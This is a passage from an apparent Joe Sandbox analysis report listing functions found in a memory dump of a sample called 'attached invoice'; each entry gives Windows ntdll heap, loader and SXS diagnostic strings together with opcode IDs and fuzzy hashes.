                                                                                                    • Instruction ID: 6aac4ad2a8b26c0599c008e4c0ae340dcc62ba6174af1fd9c5b3732bf7e3f55b
                                                                                                    • Opcode Fuzzy Hash: ee602602db1a63f85564829578de96bcbe5fbb12ab6de3db519acd03c1b2b080
                                                                                                    • Instruction Fuzzy Hash: 7FA1E33060434A9FE725DF68C490BBABBE2EF55304F14856DE68ACB787D334AA44C791
                                                                                                    Function 0191265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • .Local, xrefs: 019127F8
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019520C0
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01951FE8
                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01951FE3, 019520BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                    • API String ID: 0-1239276146
                                                                                                    • Opcode ID: 11526183a03ecd0c20b82b289e8657b9150249a50d9e05b9807f8291d4225855
                                                                                                    • Instruction ID: 9a76e9fda73b53538f78aa1dda88565562a106b97bff77a2dc480154356b8331
                                                                                                    • Opcode Fuzzy Hash: 11526183a03ecd0c20b82b289e8657b9150249a50d9e05b9807f8291d4225855
                                                                                                    • Instruction Fuzzy Hash: 93A1AF3190122EDBDB24DF68D884BA9B7B9BF58314F2405E9E90CA7255D7309EC1CF91
                                                                                                    Function 019149F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RtlDeactivateActivationContext, xrefs: 0195322F, 0195323C, 0195325B
                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01953234
                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01953260
                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01953241
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                    • API String ID: 0-1245972979
                                                                                                    • Opcode ID: 6a60b31549982736636d16590946ba193d619d6244cf9c9e5f76af89ab4c2f1c
                                                                                                    • Instruction ID: a6f770525f8e7a873264beb7782bfd4d105f3423feabcabd453f1e80f80cf784
                                                                                                    • Opcode Fuzzy Hash: 6a60b31549982736636d16590946ba193d619d6244cf9c9e5f76af89ab4c2f1c
                                                                                                    • Instruction Fuzzy Hash: 2C610632640B069FD722CF18C881F2AB7A8FF84B91F15852DED5DAB244C730E981CB91
                                                                                                    Function 018E63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01940DEC
                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01940EB5
                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01940E72
                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01940E2F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                    • API String ID: 0-1468400865
                                                                                                    • Opcode ID: f4ed43d900f74194d60933d52a41c8ce1abd35f53f45d0adfcdbb2c4ac05b44d
                                                                                                    • Instruction ID: 161888e5983e2dfbcc873685a28c730bd944caba0f821b7eae2e79bbe97408c5
                                                                                                    • Opcode Fuzzy Hash: f4ed43d900f74194d60933d52a41c8ce1abd35f53f45d0adfcdbb2c4ac05b44d
                                                                                                    • Instruction Fuzzy Hash: AA71D0B19043099FCB61DF14C8C4F9B7BE9AFA5758F140469F9488A246E334E688CBD2
                                                                                                    Function 01990D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                    • API String ID: 0-336120773
                                                                                                    • Opcode ID: db773d4764ca43b48da51a9a04d255861563a03d81dcdbac1534b24ccd903261
                                                                                                    • Instruction ID: d73b5e3d69ade33a898f467db8f9c2c6fcfc74662d8664d5c0e098ed295041cb
                                                                                                    • Opcode Fuzzy Hash: db773d4764ca43b48da51a9a04d255861563a03d81dcdbac1534b24ccd903261
                                                                                                    • Instruction Fuzzy Hash: A5312131201615EFDB11DB9CD888F6A77ACEF05B60F190459F429CB350E671AB40CB61
                                                                                                    Function 0190237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0194A79F
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0194A7AF
                                                                                                    • apphelp.dll, xrefs: 01902382
                                                                                                    • LdrpDynamicShimModule, xrefs: 0194A7A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-176724104
                                                                                                    • Opcode ID: 70949d27959b891a14c5773e43e01edccfdaabec50eeea25bf3862f9b5f8798a
                                                                                                    • Instruction ID: 5f32c0407160d562086b0854017a7e326b28b2e3fd461338eec6f70ac2820cc8
                                                                                                    • Opcode Fuzzy Hash: 70949d27959b891a14c5773e43e01edccfdaabec50eeea25bf3862f9b5f8798a
                                                                                                    • Instruction Fuzzy Hash: 2F3148B1A45201AFEB35DF1DD885E6977B9FBC4B00F14001DE90AA7385D7B09A81CB92
                                                                                                    Function 018F28C0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • HEAP[%wZ]: , xrefs: 018F3175
                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018F319D
                                                                                                    • HEAP: , xrefs: 018F3184
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                    • API String ID: 0-617086771
                                                                                                    • Opcode ID: 7db0431d4e7be0dc2b993569842db83b94ef74854551099c7b2429a432b18e69
                                                                                                    • Instruction ID: e994c7e42291711f8f7af0206fd366f84c63872d0b3457e3a5f2587a34fb1efe
                                                                                                    • Opcode Fuzzy Hash: 7db0431d4e7be0dc2b993569842db83b94ef74854551099c7b2429a432b18e69
                                                                                                    • Instruction Fuzzy Hash: 3F929C71A042499FDB25CF68C484BAEBBF2FF48304F14809DEA59EB391D735AA45CB50
                                                                                                    Function 018F0680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-4253913091
                                                                                                    • Opcode ID: 0041566201246956744f10a5b95fb3823b5bf18a063407344ad42ed51725fbf2
                                                                                                    • Instruction ID: 7806df88da1096e9b5f85bcdcd2c3d60cc9b22ee6352975052aaf3f49f327bc1
                                                                                                    • Opcode Fuzzy Hash: 0041566201246956744f10a5b95fb3823b5bf18a063407344ad42ed51725fbf2
                                                                                                    • Instruction Fuzzy Hash: C5F18F74600606DFEB25CF68C894F6AB7B6FF44704F148199E61ADB382D734EA81CB91
                                                                                                    Function 01906882 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: $@
                                                                                                    • API String ID: 2994545307-1077428164
                                                                                                    • Opcode ID: 3696b08801cdfb3321a21ec061c3b9ca78d2e20865e0ebd3eee0936900dad031
                                                                                                    • Instruction ID: 180af4833abca0afea969cbebbc20d76decbc63b5c7c91ae48768f854da86117
                                                                                                    • Opcode Fuzzy Hash: 3696b08801cdfb3321a21ec061c3b9ca78d2e20865e0ebd3eee0936900dad031
                                                                                                    • Instruction Fuzzy Hash: 00C270716093419FD72ACF68C880BABBBE5AF88754F04892DE9CDC7281D734E945CB52
                                                                                                    Function 018DA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                    • API String ID: 0-2779062949
                                                                                                    • Opcode ID: db76b39413258e9321ab01b02b7d335b42cbd5c7bf06c3b1a4cf9342ea8d3373
                                                                                                    • Instruction ID: 5e52fccdac14ea8b39a16924a48a96e13946b87e1513a334046e4e3534fb9c14
                                                                                                    • Opcode Fuzzy Hash: db76b39413258e9321ab01b02b7d335b42cbd5c7bf06c3b1a4cf9342ea8d3373
                                                                                                    • Instruction Fuzzy Hash: FDA13B759016299ADF31EB68CC88BAAB7B8EF84711F1005EAE90DE7250D7359E84CF50
                                                                                                    Function 01900AEB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpCheckModule, xrefs: 01949F24
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01949F2E
                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 01949F1C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-161242083
                                                                                                    • Opcode ID: 78fd41832b89175552d326f059923df8027cc7734eb2742d19ddc7ae1446ae76
                                                                                                    • Instruction ID: c5d1ee5f38adea6b8e55fccc02df101f22a89a807e0de2cf8958d5f7eb320852
                                                                                                    • Opcode Fuzzy Hash: 78fd41832b89175552d326f059923df8027cc7734eb2742d19ddc7ae1446ae76
                                                                                                    • Instruction Fuzzy Hash: 7071DE70A002059FDF25DF68C884BBEB7F4EB48708F08446DE90AE7285E734AA81CB51
                                                                                                    Function 018F096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-1334570610
                                                                                                    • Opcode ID: d22ef8ccad43ab4c91b3a15f1ef880284398ab3c67eb489068fb7bc90d902a9f
                                                                                                    • Instruction ID: fb8801692497cdf2c3f5cce8b04e4a8f83c07ee74f1e5bf5910f8e6180a43a25
                                                                                                    • Opcode Fuzzy Hash: d22ef8ccad43ab4c91b3a15f1ef880284398ab3c67eb489068fb7bc90d902a9f
                                                                                                    • Instruction Fuzzy Hash: 9E61CF716003059FEB29CF28C880B66BBE6FF49304F15855EE949CF242E770EA85CB91
                                                                                                    Function 0191C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 019580E9
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019580F3
                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 019580E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1783798831
                                                                                                    • Opcode ID: 2df58e7b205d15f5af7f2b2be33e19b8688fe4f14118c232b660d409c6e96452
                                                                                                    • Instruction ID: abdb5fde8c0f0d7d275534257c13bc6f12578604c823959f32e8ab88fb57984e
                                                                                                    • Opcode Fuzzy Hash: 2df58e7b205d15f5af7f2b2be33e19b8688fe4f14118c232b660d409c6e96452
                                                                                                    • Instruction Fuzzy Hash: 3D410471545306ABD721EB28ED44B5B77E8FF94750F00482EB94CD3298EB74E940CB92
                                                                                                    Function 019643D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpCheckRedirection, xrefs: 0196450F
                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01964508
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01964519
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-3154609507
                                                                                                    • Opcode ID: 4a9daf1d33a440e0c908b44b9f66d9fcf758c850ff2a3b48a88e9e3fdb4fb8d2
                                                                                                    • Instruction ID: 66a89e1b659decbb7251c4b19b81973847a46a90928baa3936c08f8bd89a24a9
                                                                                                    • Opcode Fuzzy Hash: 4a9daf1d33a440e0c908b44b9f66d9fcf758c850ff2a3b48a88e9e3fdb4fb8d2
                                                                                                    • Instruction Fuzzy Hash: 9241D2726053119BCB21CFEDD881A66BBECAF88F51B0A0A59ED5CD7356D731D800CBA1
                                                                                                    Function 018F0ACE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-2558761708
                                                                                                    • Opcode ID: 35d1d65a85c0ce398b3db45444bf7defcd1414295412fe03d6fd34184fc01536
                                                                                                    • Instruction ID: ee82875c6311ebfa0381cc9f9bf0fdbe9d0dad740b3e339837866a3c8741bd7b
                                                                                                    • Opcode Fuzzy Hash: 35d1d65a85c0ce398b3db45444bf7defcd1414295412fe03d6fd34184fc01536
                                                                                                    • Instruction Fuzzy Hash: 4F1103313012469FEB29DA59C484F3AB7AAFF81715F16852EF50ACB342EB30DA40C741
                                                                                                    Function 018EA8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrResSearchResource Enter, xrefs: 018EA933
                                                                                                    • LdrResSearchResource Exit, xrefs: 018EA945
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                    • API String ID: 0-4066393604
                                                                                                    • Opcode ID: e59d23601acc9a16ad69c049b8a2b42ca62eebed404de28020d31dc74c7c9324
                                                                                                    • Instruction ID: f42d802416b1c06993c4047323ca8a8ead527866f02f21fbf15645d202478ade
                                                                                                    • Opcode Fuzzy Hash: e59d23601acc9a16ad69c049b8a2b42ca62eebed404de28020d31dc74c7c9324
                                                                                                    • Instruction Fuzzy Hash: 02E19D71E002199FEF2ACF99D988BAEBBB9BF46704F15402AF915E7251D734DA40CB10
                                                                                                    Function 01982AE0 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • , xrefs: 01982E38
                                                                                                    • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 01982B91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                    • API String ID: 0-4088147954
                                                                                                    • Opcode ID: a7cc8ed1188f1b41b83a4269535ccb91d784a078fcf022ef8e454b31871a481a
                                                                                                    • Instruction ID: f86342d1266b2262a9d330e6605d444d1ada64af644f49bb0abc780c0322ae55
                                                                                                    • Opcode Fuzzy Hash: a7cc8ed1188f1b41b83a4269535ccb91d784a078fcf022ef8e454b31871a481a
                                                                                                    • Instruction Fuzzy Hash: 5CC1C171A083019FE721EF59C440B2BBBE9AFD9314F04491DFA8D9B281D774E945C792
                                                                                                    Function 0195E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Legacy$UEFI
                                                                                                    • API String ID: 2994545307-634100481
                                                                                                    • Opcode ID: 5ab470917381403efed25d29c9be2af65ce585d90c636f7cf9a721e82e09c567
                                                                                                    • Instruction ID: e02823f81a62957a54d99010138afdee4e59d9f2992602aac84ed517f38b293f
                                                                                                    • Opcode Fuzzy Hash: 5ab470917381403efed25d29c9be2af65ce585d90c636f7cf9a721e82e09c567
                                                                                                    • Instruction Fuzzy Hash: 04616E71A002199FDB55DFA8C880BADFBB9FF44704F14446EEA49EB251E731EA01CB50
                                                                                                    Function 018EAB70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpResGetMappingSize Exit, xrefs: 018EAB9C
                                                                                                    • LdrpResGetMappingSize Enter, xrefs: 018EAB8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                    • API String ID: 0-1497657909
                                                                                                    • Opcode ID: d39d31766d6cbb2feb3a1540bce40ed9a03deefc80f5f2ff8c551b4838386fc1
                                                                                                    • Instruction ID: bf20e822a4cc72ba07f82c00a660f50af810a1f2867808ff12b9828a51104141
                                                                                                    • Opcode Fuzzy Hash: d39d31766d6cbb2feb3a1540bce40ed9a03deefc80f5f2ff8c551b4838386fc1
                                                                                                    • Instruction Fuzzy Hash: 5C61D371A042599FEB1ACFA8C884BA9BBF9BF55B04F040559E905EB381D775DA40C720
                                                                                                    Function 01914B79 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0$Flst
                                                                                                    • API String ID: 0-758220159
                                                                                                    • Opcode ID: b740142f3d24bf8c8f41fb3d7fe27ad05c60fd17cc187b9880ba211bfdafbce4
                                                                                                    • Instruction ID: cb8802b010c3a8b2f89a6e65654d40948989316c0a0cd086cd6e046e7a57207c
                                                                                                    • Opcode Fuzzy Hash: b740142f3d24bf8c8f41fb3d7fe27ad05c60fd17cc187b9880ba211bfdafbce4
                                                                                                    • Instruction Fuzzy Hash: BD518EB1E012498FDB26CF98C484BADFBF8FF48756F148529D44DAB24AE7709981CB40
                                                                                                    Function 018E0485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • kLsE, xrefs: 018E05FE
                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018E0586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                    • API String ID: 0-2547482624
                                                                                                    • Opcode ID: b7ce77ba57e4fcbb3857fa9f8567c5ab0a81846d2d12c3b6fb41207d08c170a0
                                                                                                    • Instruction ID: a60d4f74c0d54029b5bfdc243cee733e25014a1ded863aabfe7a70c23c3d8006
                                                                                                    • Opcode Fuzzy Hash: b7ce77ba57e4fcbb3857fa9f8567c5ab0a81846d2d12c3b6fb41207d08c170a0
                                                                                                    • Instruction Fuzzy Hash: B851A371B0074ADFDB24DFA8C4886AAB7F8AF46304F10483EF59AE7241D7B49645CB52
                                                                                                    Function 01912DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 01952611
                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 01952616
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                    • API String ID: 0-2104531740
                                                                                                    • Opcode ID: c4bdd0960a4537f638c6faf8da018de57ca7ebdd1340ea7ac78d51a282545004
                                                                                                    • Instruction ID: 133bb2b56974bc70933562a47ef4fb0574bafc03299ebf9b7395b44bc7fbf768
                                                                                                    • Opcode Fuzzy Hash: c4bdd0960a4537f638c6faf8da018de57ca7ebdd1340ea7ac78d51a282545004
                                                                                                    • Instruction Fuzzy Hash: 2C41F872500215EBD725DF59C450E7AB7B9FF94714F24842EEE4AAB244D730ED82CB90
                                                                                                    Function 018EA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 018EA21B
                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 018EA229
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                    • API String ID: 0-2876891731
                                                                                                    • Opcode ID: e249a22ce32344f3465d038eb96e425b86bd9385a366fa0c279f7f2901964e65
                                                                                                    • Instruction ID: a0a3de07053a1d1fe373e4a411bdc78e5230449395782095539b1b0e17f6bd94
                                                                                                    • Opcode Fuzzy Hash: e249a22ce32344f3465d038eb96e425b86bd9385a366fa0c279f7f2901964e65
                                                                                                    • Instruction Fuzzy Hash: 1D41DC35A00655DBDB19CF59D444B69BBF8FF86B44F1440A9EA08EB3A1E336DA00CB10
                                                                                                    Function 0191A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
